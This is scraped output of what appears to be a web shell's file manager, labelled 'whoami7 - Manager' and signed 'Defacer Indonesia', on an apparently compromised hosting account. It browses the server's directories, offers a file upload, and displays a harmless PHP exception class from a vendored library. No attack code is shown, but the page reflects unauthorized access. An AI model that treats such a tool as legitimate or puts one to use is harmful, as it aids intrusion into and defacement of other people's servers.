whoami7 - Manager
:
/
home
/
n170823s
/
public_html
/
vendor_old
/
spatie
/
flare-client-php
/
src
/
Http
/
Exceptions
/
Upload File:
files >> //home/n170823s/public_html/vendor_old/spatie/flare-client-php/src/Http/Exceptions/InvalidData.php
<?php namespace Spatie\FlareClient\Http\Exceptions; use Spatie\FlareClient\Http\Response; class InvalidData extends BadResponseCode { public static function getMessageForResponse(Response $response): string { return 'Invalid data found'; } }
Copyright ©2021 || Defacer Indonesia